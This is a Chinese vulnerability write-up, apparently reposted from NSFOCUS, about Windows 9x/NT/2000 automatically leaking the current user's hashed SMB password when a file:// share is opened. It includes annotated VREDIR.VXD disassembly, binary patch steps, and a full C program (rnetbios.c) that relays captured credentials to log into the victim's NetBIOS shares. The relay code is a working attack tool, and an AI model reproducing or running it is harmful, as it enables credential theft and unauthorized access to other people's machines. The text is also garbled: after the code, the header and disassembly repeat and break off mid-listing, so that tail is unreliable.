WINDOWS密码泄露漏洞分析
来源:互联网 发布:汽车钥匙编程匹配仪 编辑:程序博客网 时间:2024/04/30 17:04
发布日期:2002-09-19
文章内容:
日期:2000-04-12
作者:袁哥 < mailto: yuange@nsfocus.com >
主页: http://www.nsfocus.com
漏洞说明:
WINDOWS系统访问共享文件时(file://协议,可以在HTM里面夹杂此协议),
会自动试着以当前用户的身份连接(发送用户名、加密的密码),如果不能
连接才提示用户输入用户名和密码,所以造成密码泄漏。
影响版本:WIN95、WIN98、WINNT、WIN2000。
补救措施:找微软。
下面是WIN98系统的泄露密码相关代码分析。这是文件VREDIR.VXD的一段代码:
15760 sub_0285 proc near
15760 55 push ebp
15761 8B EC mov ebp,esp
15763 83 EC 0C sub esp,0Ch
15766 33 C0 xor eax,eax
15768 53 push ebx
15769 56 push esi
1576A 57 push edi
1576B 8B 7D 08 mov edi,dword ptr [ebp+PARAMETER_1]
1576E 8B 5D 14 mov ebx,dword ptr [ebp+PARAMETER_4]
15771 66| C7 43 01 00FF mov word ptr [ebx+1],0FFh
15777 8B 77 1C mov esi,dword ptr [edi+1Ch]
1577A 8A 47 05 mov al,byte ptr [edi+5]
1577D 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15780 C6 03 0D mov byte ptr [ebx],0Dh
15783 8B 0C 85 00000AE0 mov ecx,dword ptr data_0114[eax*4] ;
1578A 8B 45 18 mov eax,dword ptr [ebp+PARAMETER_5]
1578D 66| 89 43 05 mov word ptr [ebx+5],ax
15791 89 4D F8 mov dword ptr [ebp+LOCAL_2],ecx
;the login user block 用户信息块
15794 66| 0F B6 4A 18 movzx cx,byte ptr [edx+18h]
15799 66| 89 4B 07 mov word ptr [ebx+7],cx
1579D 8D 42 2C lea eax,dword ptr [edx+2Ch]
157A0 ?0 push eax
157A1 E8 FFFFFADA call sub_0282
157A6 66| 89 43 09 mov word ptr [ebx+9],ax
157AA 83 C4 04 add esp,4
157AD C7 43 13 00000000 mov dword ptr [ebx+13h],0
157B4 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
157B7 C7 43 17 00000000 mov dword ptr [ebx+17h],0
157BE 8B 4A 28 mov ecx,dword ptr [edx+28h]
157C1 89 4B 0B mov dword ptr [ebx+0Bh],ecx
;key
157C4 66| 8B 4A 1A mov cx,word ptr [edx+1Ah]
157C8 66| 8B C1 mov ax,cx
157CB 66| 25 0200 and ax,200h
157CF 66| 3D 0001 cmp ax,1
157D3 B8 00000000 mov eax,0
157D8 83 D0 FF adc eax,0FFFFFFFFh
157DB 66| 83 E1 03 and cx,3
157DF 83 E0 04 and eax,4
157E2 66| 83 F9 01 cmp cx,1
157E6 89 43 17 mov dword ptr [ebx+17h],eax
157E9 1B C9 sbb ecx,ecx
157EB 41 inc ecx
157EC 0B C8 or ecx,eax
157EE 83 7D F8 00 cmp dword ptr [ebp+LOCAL_2],0
157F2 89 4B 17 mov dword ptr [ebx+17h],ecx
157F5 0F 84 00000244 jz loc_1740
157FB 8A 4A 19 mov cl,byte ptr [edx+19h]
; SECURITY MODE 安全模式
;是服务方发过来的数据,所以服务方可以主动按其需要修改
157FE F6 C1 01 test cl,1
15801 0F 84 000001CB jz loc_1739
; USER OR SHARE MODE
;共享控制的跳转
15807 80 7F 05 02 cmp byte ptr [edi+5],2
1580B 75 53 jne short loc_1729
1580D 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15810 8B 70 28 mov esi,dword ptr [eax+28h]
15813 85 F6 test esi,esi
15815 74 12 jz short loc_1726
15817 8D 7B 1D lea edi,dword ptr [ebx+1Dh]
1581A B9 00000006 mov ecx,6
1581F F3/ A5 rep movsd
15821 66| C7 43 0F 0018 mov word ptr [ebx+0Fh],18h
;PASSWORD LONG
15827 EB 06 jmp short loc_1727
15829 loc_1726:
15829 66| C7 43 0F 0000 mov word ptr [ebx+0Fh],0
1582F loc_1727:
1582F 33 C0 xor eax,eax
15831 8B 4D F8 mov ecx,dword ptr [ebp+LOCAL_2]
15834 66| 8B 43 0F mov ax,word ptr [ebx+0Fh]
15838 8B 71 2C mov esi,dword ptr [ecx+2Ch]
1583B 85 F6 test esi,esi
1583D 8D 7C 18 1D lea edi,dword ptr [eax+1Dh][ebx]
15841 74 12 jz short loc_1728
15843 B9 00000006 mov ecx,6
15848 F3/ A5 rep movsd
1584A 66| C7 43 11 0018 mov word ptr [ebx+11h],18h
15850 E9 000000E8 jmp loc_1736
15855 loc_1728:
15855 66| C7 43 11 0000mov word ptr [ebx+11h],0
1585B E9 000000DD jmp loc_1736
15860 loc_1729:
15860 C7 45 FC 00001A78 mov dword ptr [ebp+LOCAL_1],1A78h
15867 F6 46 1C 20 test byte ptr [esi+1Ch],20h
1586B 74 08 jz short loc_1730
1586D 83 C6 35 add esi,35h
15870 89 75 FC mov dword ptr [ebp+LOCAL_1],esi
15873 EB 12 jmp short loc_1731
15875 loc_1730:
15875 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15878 8B 42 0C mov eax,dword ptr [edx+0Ch]
1587B F6 40 1C 20 test byte ptr [eax+1Ch],20h
1587F 74 06 jz short loc_1731
15881 83 C0 35 add eax,35h
;THE PASSWORD POINTER
15884 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
15887 loc_1731:
15887 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
1588A 80 38 00 cmp byte ptr [eax],0;
;THE PASSWORD
1588D 75 09 jne short loc_1732
;比较看有否输入密码,如果没有密码就用用户密码替换
;因为开始还没有出来提示输入密码时就有好几次密码实验,
;所以一定有没有密码的情况,也就泄露了当前用户密码
1588F 8B 45 F8 mov eax,dword ptr [ebp+LOCAL_2]
15892 83 C0 05 add eax,5
15895 89 45 FC mov dword ptr [ebp+LOCAL_1],eax
; 登录WINDOWS用户的密码替换没有密码的指针
;就这产生泄露密码漏洞
15898 loc_1732:
15898 F6 C1 02 test cl,2
;密码加密不?服务端发过来的安全模式
1589B 66| C7 43 0F 0018 mov word ptr [ebx+0Fh],18h
;PASSWORD LONG
158A1 66| C7 43 11 0000 mov word ptr [ebx+11h],0
158A7 74 76 jz short loc_1734
;密码不加密跳转
158A9 F6 C1 0C test cl,0Ch
158AC 74 3C jz short loc_1733
158AE 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
158B1 F6 42 14 02 test byte ptr [edx+14h],2
158B5 75 33 jnz short loc_1733
158B7 8D 73 1D lea esi,dword ptr [ebx+1Dh]
158BA 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
158BD 56 push esi
158BE 50 push eax
158BF 8D 42 6C lea eax,dword ptr [edx+6Ch]
158C2 50 push eax
158C3 E8 FFFF15F4 call sub_0068
;LOCK THE PASSWORD
158C8 83 C4 0C add esp,0Ch
158CB 8B 4D 10 mov ecx,dword ptr [ebp+PARAMETER_3]
158CE 81 C1 0000009C add ecx,9Ch
158D4 8B 06 mov eax,[esi]
158D6 89 01 mov [ecx],eax
158D8 8B 56 04 mov edx,dword ptr [esi+4]
158DB 89 51 04 mov dword ptr [ecx+4],edx
158DE 8B 7E 08 mov edi,dword ptr [esi+8]
158E1 89 79 08 mov dword ptr [ecx+8],edi
158E4 8B 46 0C mov eax,dword ptr [esi+0Ch]
158E7 89 41 0C mov dword ptr [ecx+0Ch],eax
158EA loc_1733:
158EA 8D 73 1D lea esi,dword ptr [ebx+1Dh]
158ED 8B 45 FC mov eax,dword ptr [ebp+LOCAL_1]
158F0 56 push esi
158F1 50 push eax
158F2 8B 45 10 mov eax,dword ptr [ebp+PARAMETER_3]
158F5 83 C0 6C add eax,6Ch
158F8 50 push eax
158F9 E8 FFFF15B8 call sub_0067
158FE 83 C4 0C add esp,0Ch
15901 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15904 F6 42 19 0C test byte ptr [edx+19h],0Ch
15908 74 33 jz short loc_1736
1590A F6 42 14 02 test byte ptr [edx+14h],2
1590E 75 2D jnz short loc_1736
15910 8D BA 00000084 lea edi,dword ptr data_0010[edx]
15916 B9 00000006 mov ecx,6
1591B F3/ A5 rep movsd
1591D EB 1E jmp short loc_1736
1591F loc_1734:
;不加密密码跳转到这
1591F 80 3D 000001E0 00 cmp byte ptr data_0041,0 ;
; 准许明文密码不?
;注册表中的一项 ENABLEPLAINTEXTPASSWORD 设置,可惜现在缺省是不准,
;要不就可以得到明文密码了
15926 74 0F je short loc_1735
15928 8D 7B 1D lea edi,dword ptr [ebx+1Dh]
1592B 8B 75 FC mov esi,dword ptr [ebp+LOCAL_1]
1592E B9 00000006 mov ecx,6
15933 F3/ A5 rep movsd
;THE PASSWORD ,NOT LOCK
15935 EB 06 jmp short loc_1736
15937 loc_1735:
15937 66| C7 43 0F 0000 mov word ptr [ebx+0Fh],0
1593D loc_1736:
1593D 8B 75 F8 mov esi,dword ptr [ebp+LOCAL_2]
15940 B9 FFFFFFFF mov ecx,0FFFFFFFFh
15945 83 C6 13 add esi,13h
15948 2B C0 sub eax,eax
1594A 8B FE mov edi,esi
1594C F2/ AE repne scasb
1594E F7 D1 not ecx
15950 8B C1 mov eax,ecx
15952 33 D2 xor edx,edx
15954 66| 8B 53 11 mov dx,word ptr [ebx+11h]
15958 33 C9 xor ecx,ecx
1595A 66| 8B 4B 0F mov cx,word ptr [ebx+0Fh]
1595E 03 CA add ecx,edx
15960 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15963 8D 7C 19 1D lea edi,dword ptr [ecx+1Dh][ebx]
15967 66| 8B 4A 1A mov cx,word ptr [edx+1Ah]
1596B 89 7D FC mov dword ptr [ebp+LOCAL_1],edi
1596E F6 C5 02 test ch,2
15971 74 2F jz short loc_1737
15973 F6 C1 80 test cl,80h
15976 74 2A jz short loc_1737
15978 83 3D 0000190C 00 cmp dword ptr data_0161,0
1597F 74 21 je short loc_1737
15981 8B CF mov ecx,edi
15983 6A 01 push dword ptr 1
15985 2B 4D 0C sub ecx,dword ptr [ebp+PARAMETER_2]
15988 50 push eax
15989 83 E1 01 and ecx,1
1598C 56 push esi
1598D 66| 01 4B 1B add word ptr [ebx+1Bh],cx
15991 01 4D FC add dword ptr [ebp+LOCAL_1],ecx
15994 8B 4D FC mov ecx,dword ptr [ebp+LOCAL_1]
15997 51 push ecx
15998 E8 FFFF1679 call sub_0097
1599D 83 C4 10 add esp,10h
159A0 EB 11 jmp short loc_1738
159A2 loc_1737:
159A2 8B 7D FC mov edi,dword ptr [ebp+LOCAL_1]
159A5 8B C8 mov ecx,eax
159A7 C1 E9 02 shr ecx,2
159AA F3/ A5 rep movsd
159AC 8B C8 mov ecx,eax
159AE 83 E1 03 and ecx,3
159B1 F3/ A4 rep movsb
159B3 loc_1738:
159B3 66| 8B 4B 0F mov cx,word ptr [ebx+0Fh]
159B7 8B 55 FC mov edx,dword ptr [ebp+LOCAL_1]
159BA 66| 03 4B 11 add cx,word ptr [ebx+11h]
159BE 03 D0 add edx,eax
159C0 66| 03 C8 add cx,ax
159C3 66| 89 4B 1B mov word ptr [ebx+1Bh],cx
159C7 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
159CA 89 51 3A mov dword ptr [ecx+3Ah],edx
159CD E9 0000008A jmp loc_1741
159D2 loc_1739:
159D2 C6 43 1D 00 mov byte ptr [ebx+1Dh],0
159D6 8B 75 F8 mov esi,dword ptr [ebp+LOCAL_2]
159D9 B9 FFFFFFFF mov ecx,0FFFFFFFFh
159DE C6 43 1E 00 mov byte ptr [ebx+1Eh],0
159E2 66| C7 43 11 0001 mov word ptr [ebx+11h],1
159E8 66| C7 43 0F 0001 mov word ptr [ebx+0Fh],1
159EE 83 C6 13 add esi,13h
159F1 2B C0 sub eax,eax
159F3 8B FE mov edi,esi
159F5 F2/ AE repne scasb
159F7 F7 D1 not ecx
159F9 8B D1 mov edx,ecx
159FB 33 C9 xor ecx,ecx
159FD 66| 8B 4B 11 mov cx,word ptr [ebx+11h]
15A01 8D 42 02 lea eax,dword ptr [edx+2]
15A04 66| 89 43 1B mov word ptr [ebx+1Bh],ax
15A08 33 C0 xor eax,eax
15A0A 66| 8B 43 0F mov ax,word ptr [ebx+0Fh]
15A0E 03 C1 add eax,ecx
15A10 8B CA mov ecx,edx
15A12 C1 E9 02 shr ecx,2
15A15 8D 7C 18 1D lea edi,dword ptr [eax+1Dh][ebx]
15A19 F3/ A5 rep movsd
; THE USER NAME
15A1B 8B CA mov ecx,edx
15A1D 83 E1 03 and ecx,3
15A20 F3/ A4 rep movsb
15A22 33 F6 xor esi,esi
15A24 33 C0 xor eax,eax
15A26 66| 8B 73 0F mov si,word ptr [ebx+0Fh]
15A2A 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
15A2D 66| 8B 43 11 mov ax,word ptr [ebx+11h]
15A31 03 F0 add esi,eax
15A33 03 F2 add esi,edx
15A35 03 F3 add esi,ebx
15A37 83 C6 1D add esi,1Dh
15A3A 89 71 3A mov dword ptr [ecx+3Ah],esi
15A3D EB 1D jmp short loc_1741
15A3F loc_1740:
15A3F 33 C0 xor eax,eax
15A41 8D 53 1F lea edx,dword ptr [ebx+1Fh]
15A44 66| 89 43 0F mov word ptr [ebx+0Fh],ax
15A48 66| 89 43 11 mov word ptr [ebx+11h],ax
15A4C 66| 89 43 1D mov word ptr [ebx+1Dh],ax
15A50 8B 45 0C mov eax,dword ptr [ebp+PARAMETER_2]
15A53 66| C7 43 1B 0002 mov word ptr [ebx+1Bh],2
15A59 89 50 3A mov dword ptr [eax+3Ah],edx
15A5C loc_1741:
15A5C 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15A5F 66| 8B 42 1A mov ax,word ptr [edx+1Ah]
15A63 F6 C4 02 test ah,2
15A66 0F 84 000000C9 jz loc_1744
15A6C A8 80 test al,80h
15A6E 0F 84 000000C1 jz loc_1744
15A74 83 3D 0000190C 00 cmp dword ptr data_0161,0
15A7B 0F 84 000000B4 je loc_1744
15A81 8B 4D 0C mov ecx,dword ptr [ebp+PARAMETER_2]
15A84 83 7D F8 00 cmp dword ptr [ebp+LOCAL_2],0
15A88 8B 71 3A mov esi,dword ptr [ecx+3Ah]
15A8B 89 75 FC mov dword ptr [ebp+LOCAL_1],esi
15A8E 74 1E jz short loc_1742
15A90 8B 55 F8 mov edx,dword ptr [ebp+LOCAL_2]
15A93 83 C2 30 add edx,30h
15A96 80 3A 00 cmp byte ptr [edx],0
15A99 74 13 je short loc_1742
15A9B 8B FA mov edi,edx
15A9D B9 FFFFFFFF mov ecx,0FFFFFFFFh
15AA2 2B C0 sub eax,eax
15AA4 6A 01 push dword ptr 1
15AA6 F2/ AE repne scasb
15AA8 F7 D1 not ecx
15AAA 51 push ecx
15AAB 52 push edx
15AAC EB 18 jmp short loc_1743
15AAE loc_1742:
15AAE BF 000021D2 mov edi,21D2h
15AB3 B9 FFFFFFFF mov ecx,0FFFFFFFFh
15AB8 2B C0 sub eax,eax
15ABA 6A 01 push dword ptr 1
15ABC F2/ AE repne scasb
15ABE F7 D1 not ecx
15AC0 51 pushecx
这得到的密码一般是加密的,但可以离线破解,其实还有一个攻击。让我们先来
看看SMB的连接过程。下面是SMB的密码认证方式、WINDOWS的139口的访问过程,
箭头表示数据方向:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端-------客户端类型、支持的服务方式列表等----------->服务端
3、客户端<------服务器支持协议、认证方式、加密用的key等-----服务端
认证方式就是用户级认证还是共享级认证和密码加密不,key是服务器随机生成的
8个字节,WIN2000已经支持16个字节的 key。
4、客户端--------------用户名、加密后密码----------------->服务端
WIN9X、WINNT、WIN2000这有个漏洞,不经过提示等就把当前用户名,密码加密后
发过去了,导致密码泄漏。这儿加密是DES的变形,lockedpass=chgdes(key,pass)。
这儿的pass是作为DES变形的KEY,key是作为DES变形的待加密数据。
5、客户端<---------------认证成功否-----------------------服务端
WINDOWS客户端第4步有漏洞,显然服务端可以得到username和
lockedpass=chgdes(key,pass), 其中key可以自由指定,因为这是服务方提供的,
usname、pass是客户端当前访问者用户名和密码。这儿的加密变换不可逆,但已经
可以用暴力法破解了,也已经有了这样的程序。其实我们有时并不一定要得到密码
明文的,只要能提供连接需要的就可以了。我们来看得到lockedpass有什么用,我
们反过去访问看看,telnet、ftp等连接要密码明文我们得到的lockedpass不能提
供,那么我们考虑用同样加密算法传密码密文的服务呢?比如就是NETBIOS共享服
务。前面是服务端得到东西,那现在就是站在客户端了,再看前面那过程,显然其
实我们并不需要提供pass,是不是只需要提供username和lockedpass2=chgdes(key2,pass)
就可以了?其中key2是现在的服务端提供的。看看我们有
usname和lockedpass=chgdes(key,pass)其中key我们可以自己指定,大家一看显然
只要key=key2那么就需要的我们都有了是不是?所以我们要使得key=key2.
好,让我们再仔细看看连接过程,别人连接两步1、2:
1、客户端<--------------------建立TCP连接----------------->服务端
2、客户端--------客户端类型、支持的服务方式列表等---------->服务端
下面就该:
3、客户端<---------服务器认证方式、加密用的key等-----------服务端
这我们需要提供key,这儿我们不能随便提供key,需要提供key2,那么我们就要得到
key2,显然需要连接NETBIOS服务回去。显然这而需要连接回去的11,22,33共3步
(为了区分连接回去的步子用重号表示)才能得到key2,显然这2步和3步不需要有
先后顺序。所以我们可以得到连接指定IP的NETBIOS服务然后等这用户来访问,这可
能有时间超时等处理,或者等到任意IP连接NETBIOS服务后马上连回去,反正怎么处
理方便、满足需要就怎么处理。下面显然就是设置 key=key2返回3,那就等4得到
lockedpass了,第5步嘛就你自由处理了,要不返回密码错误,后面就是44、55。。。。
总的来就是1,2,11,22,33,3,4,5,44,55。。。。。显然你就是以那机器访
问你的用户的身份去访问他的NETBIOS服务了,能干什么那就看那用户的权限了。
下面是我做的利用这漏洞的程序,因为是为了演示这漏洞,所以程序做得不是很完
美。可以在WIN9X里面运行,因为是作为139口的守护进程,所以需要把运行机器本
身的139口关掉,可以在VNBT。386文件里面寻找HEX: 68 8B 00 00 00 (NETBIOS
开139口的代码,0x8b=139),改成68 EF 00 00 00,本身的139口就成了239口了。还
有WINNT系统的磁盘一般共享为DRIVE$,在共享里面不显示,也可以在客户端修改让
其显示,以方便查看。修改方法,文件MSNP32.DLL,找HEX :8B 74 24 10 6A 24
56 E8 ,改成 8B 74 24 10 6A FF 56 E8就可以。如果版本不一样,可能会HEX不
一样,所以如果找不到,可以找短一点的HEX,比如6A 24 ??E8,"??"表示任意
一字节数据。 因为MSNO32.DLL文件始终是处于打开方式,所以修改可以先复制一
份,修改复制的,改好后启动到DOS,覆盖回去。
// rnetbios.c
// useage: rnetbios [ip] [ip]
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
void printfusage(int argc ,char *argv);
void testconnect();
void get_d_ip(int argc,char *argv);
void setserver();
void openfd3(int argc,char *argv);
void opensockfd4(int argc,char *argv);
void set_servername();
void recvpacket();
void recvfd2packet();
void out();
char *server;
char buff[20480];
char buff0x72[20480];
char buff0x73[20480];
char buff0x82[]={0x82,0,0,0,0,0};
char namereq[]={0x81,0,0,0};
int long72=0;
int long73=0;
struct sockaddr_in s_in,s_in2,s_in3,s_in4;
struct sockaddr addr,addr2;
struct hostent *he;
int usernameaddress1;
int usernameaddress2;
int strflg1,strflg2;
int loginhimself;
int fd,fd2,fd3,fd4;
int i,j,k,l;
SOCKET d_ip;
char servername[]={"*SMBSERVER"};
// WIN9X 不支持,正好可以过滤WIN9X
u_short serverport=139;
u_short name;
char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,
0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,
0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00,0x20,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x41,0x41,00};
int main(int argc, char **argv)
{
printfusage(argc,argv[0]);
testconnect();
set_servername();
get_d_ip(argc,argv[1]);
setserver();
while(1){
i=sizeof(struct sockaddr);
fd2=-1;
while(fd2<=0){
fd2=accept(fd,&addr,&i);
}
memcpy(&s_in2,&addr,15);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(serverport);
if(loginhimself==1) {
s_in4.sin_addr.s_addr=s_in2.sin_addr.s_addr;
}
printf("/n Now %s ",inet_ntoa(s_in2.sin_addr));
printf("begin netbios connect %s",inet_ntoa(s_in4.sin_addr));
if(loginhimself==0) s_in2.sin_addr.s_addr=d_ip;
fd3 = socket(AF_INET, SOCK_STREAM,0);
j=0;
k=0;
l=0;
openfd3(argc,argv[2]);
printf("/n can't connect %s",inet_ntoa(s_in2.sin_addr));
closesocket(fd2);
closesocket(fd3);
}
out();
return(0);
}
void printfusage(argc,argv)
{
printf("/n rnetbios ver 1.0.");
printf("/n copywrite by yuange 2000.4.7.");
printf("/n wellcome to my homepage http://yuange.yeah.net.");
printf("/n usage: %s [ip] [ip]",argv);
//argv[0]);
}
void testconnect()
{
WSADATA wsaData;
int result;
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
}
void set_servername( )
{
int i,j;
j=0;
for(i=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[37]=0;
}
void opensockfd4(argc,argv)
{
printf("/n please use the next ip login.");
i=sizeof(struct sockaddr);
fd4=accept(fd,&addr2,&i);
memcpy(&s_in3,&addr2,15);
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(serverport);
if(argc>=3) {
server=argv;
d_ip = inet_addr(server);
}
if(d_ip==-1) d_ip=inet_addr("127.0.0.1");
// 不过好象127。0。0。1 不能用于访问NETBIOS?
printf("/n the next ip %s ", inet_ntoa(s_in3.sin_addr));
if(s_in3.sin_addr.s_addr!=d_ip&&d_ip!=0) closesocket(fd4);
else {
i = 1;
ioctlsocket(fd4, FIONBIO, &i);
while(k==0){
buff[0]=0;
buff[8]=0;
i=recv(fd4,buff,20480,0);
if(i==0) {
closesocket(fd4);
printf("/n fd4 close");
return;
}
if(memcmp(buff,namereq,3)==0) {
send(fd4,buff0x82,6,0);
printf("/n send name 0x82 packet.");
}
if(buff[8]==0x72) {
memcpy(buff0x72+0x1c,buff+0x1c,8);
memcpy(buff,buff0x72,long72);
printf("/n send smb 0x72 packet .");
buff[0x25]=5;
//run in win9x.the win9x netbios client use
//这儿客户端可能要WIN9X,不知道WINT。WIN2000怎么处理。
send(fd4,buff,long72,0);
}
if(buff[8]==0x73||buff[8]==0x75) {
long73=i;
// memcpy(buff+0x1c,buff0x73+0x1c,8);
printf("/n send smb 0x73 packet .");
if(buff[0x33]==0x18) {
memcpy(buff+0x41,buff0x73+0x41,0x18);
// copy password
if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff0x73+0x41+0x18,0x18);
// copy the next password
strflg1=buff0x73[0x0f];
strflg1&=0x80;
if(strflg1!=0) strflg1=1;
strflg2=buff[0x0f];
strflg2&=0x80;
if(strflg2!=0) strflg2=1;
//str is unicode ?
usernameaddress1=0x41+0x18+buff0x73[0x35]+strflg1;
usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
name=1;
while(name!=0){
name=buff0x73[usernameaddress1];
if(strflg1==0) ++usernameaddress1;
else usernameaddress1+=2;
buff[usernameaddress2]=name;
++usernameaddress2;
if(strflg2!=0) {
++usernameaddress2;
buff[usernameaddress2]=0;
}
}
// copy user name ,不够严谨,不过勉强能用。
printf("/n send the pass 0x%x bytes",long73);
}
else printf("/n can't chang pass");
// buff[0x9]=0;
send(fd3,buff,long73,0);
// while(k==0){ //看怎么处理好?
i=recv(fd3,buff,20480,0);
// if(i>0&&buff[0x9]==0) printf("/n now login ok .");
// if(i>0) {
// k=1;
// send(fd4,buff,i,0);
// printf("/n send fd4 0x73 packet 0x%x bytes",i);
// }
// }
k=1;
// i=-1;
}
}
}
}
void recvpacket()
{
if(j==0) recvfd2packet();
else i=recv(fd4,buff,20480,0);
if(i==0) {
if(j==0) {
printf("/n fd2 close .");
return;
}
else {
printf("/n fd4 close ." );
k=0;
closesocket(fd4);
}
}
}
void recvfd2packet()
{
buff[0x8]=0;
i=recv(fd2,buff,20480,0);
if(buff[0x8]==0x72){
memcpy(buff0x72,buff,i);
memset(buff+0xc,0,4);
//这儿是系统支持什么服务的标记,WIN2000与WINNT系统不一样。
//有一方是WINNT看一般就是0,而两方都是WIN2000后面协议的密码方式就不一样。
//设置成0,欺骗让其以WINNT的方式发送加密的密码,以好截获。但可能WIN2000支持不好。
printf("/n fd2 recv smb 0x72 packet ");
}
if(buff[0x8]==0x73||buff[0x8]==0x75){
k=0;
memcpy(buff0x73,buff,i);
if(buff0x73[0x24]==0x0c) printf("/n this is win2000 system ?");
printf("/n get password from fd2.");
}
}
void get_d_ip(argc,argv)
{
d_ip=-1;
if(argc>=2) {
server=argv;
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he) printf("/n Can't get the ip of %s !/n",server);
else memcpy(&d_ip, he->h_addr, 4);
}
}
if(d_ip==0) d_ip=-1;
if(d_ip==-1){
loginhimself=1;
printf("/n rnetbios the netbios ip.");
}
else {
loginhimself=0;
printf("/n rnetbios to %s",server);
}
s_in4.sin_addr.s_addr=d_ip;
}
void setserver()
{
fd = socket(AF_INET, SOCK_STREAM,0);
s_in.sin_family = AF_INET;
s_in.sin_port = htons(serverport);
s_in.sin_addr.s_addr = 0;
i=sizeof(struct sockaddr);
bind(fd,&s_in,i);
listen(fd,100);
}
void openfd3(argc,argv)
{
if(!connect(fd3, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in)))
{
i = 1;
ioctlsocket(fd2, FIONBIO, &i);
i = 1;
ioctlsocket(fd3, FIONBIO, &i);
while(1)
{
recvpacket();
// if(i==0){
// printf("/n fd2 or fd4 close.");
// break;
// }
if(i>0) {
if(memcmp(buff,namereq,3)==0) send(fd3,namebuff,0x48,0);
else {
send(fd3,buff,i,0);
printf("/n send fd3 0x%x packet", buff[8]);
}
}
buff[8]=0;
i=recv(fd3,buff,2048,0);
if(i>0) printf("/n recv fd3 0x%x packet 0x%x bytes",buff[0x8],i);
if(i>0&&j==0){
if(buff[8]==0x72) {
memcpy(buff0x72,buff,i);
long72=i;
}
if(buff[8]==0x73||buff[8]==0x75){
if(buff[0x9]==0&&buff0x73[0x33]==0x18){
j=1;
closesocket(fd2);
printf("/n now fd2 login ok!");
}
}
}
if(i==0){
printf("/n fd3 colse .");
break;
}
while(j==1&&k==0) opensockfd4(argc,argv);
if(i>0) {
if(j==0) send(fd2,buff,i,0);
else {
printf("/n send fd4 0x%x packet",buff[0x8]);
send(fd4,buff,i,0);
}
}
}
}
}
void out()
{
closesocket(fd);
WSACleanup( );
}
文章内容:
日期:2000-04-12
作者:袁哥 < mailto: yuange@nsfocus.com >
主页: http://www.nsfocus.com
漏洞说明:
WINDOWS系统访问共享文件时(file://协议,可以在HTM里面夹杂此协议),
会自动试着以当前用户的身份连接(发送用户名、加密的密码),如果不能
连接才提示用户输入用户名和密码,所以造成密码泄漏。
影响版本:WIN95、WIN98、WINNT、WIN2000。
补救措施:找微软。
下面是WIN98系统的泄露密码相关代码分析。这是文件VREDIR.VXD的一段代码:
15760 sub_0285 proc near
15760 55 push ebp
15761 8B EC mov ebp,esp
15763 83 EC 0C sub esp,0Ch
15766 33 C0 xor eax,eax
15768 53 push ebx
15769 56 push esi
1576A 57 push edi
1576B 8B 7D 08 mov edi,dword ptr [ebp+PARAMETER_1]
1576E 8B 5D 14 mov ebx,dword ptr [ebp+PARAMETER_4]
15771 66| C7 43 01 00FF mov word ptr [ebx+1],0FFh
15777 8B 77 1C mov esi,dword ptr [edi+1Ch]
1577A 8A 47 05 mov al,byte ptr [edi+5]
1577D 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
15780 C6 03 0D mov byte ptr [ebx],0Dh
15783 8B 0C 85 00000AE0 mov ecx,dword ptr data_0114[eax*4] ;
1578A 8B 45 18 mov eax,dword ptr [ebp+PARAMETER_5]
1578D 66| 89 43 05 mov word ptr [ebx+5],ax
15791 89 4D F8 mov dword ptr [ebp+LOCAL_2],ecx
;the login user block 用户信息块
15794 66| 0F B6 4A 18 movzx cx,byte ptr [edx+18h]
15799 66| 89 4B 07 mov word ptr [ebx+7],cx
1579D 8D 42 2C lea eax,dword ptr [edx+2Ch]
157A0 ?0 push eax
157A1 E8 FFFFFADA call sub_0282
157A6 66| 89 43 09 mov word ptr [ebx+9],ax
157AA 83 C4 04 add esp,4
157AD C7 43 13 00000000 mov dword ptr [ebx+13h],0
157B4 8B 55 10 mov edx,dword ptr [ebp+PARAMETER_3]
157B7 C7 43 17 00000000 mov dword ptr [ebx+17h],0
157BE 8B 4A 28 mov ecx,dword ptr [edx+28h]
157C1 89 4B 0B mov dword ptr [ebx+0Bh],ecx
;key
157C4 66| 8B 4A 1A mov cx,word ptr [edx+1Ah]
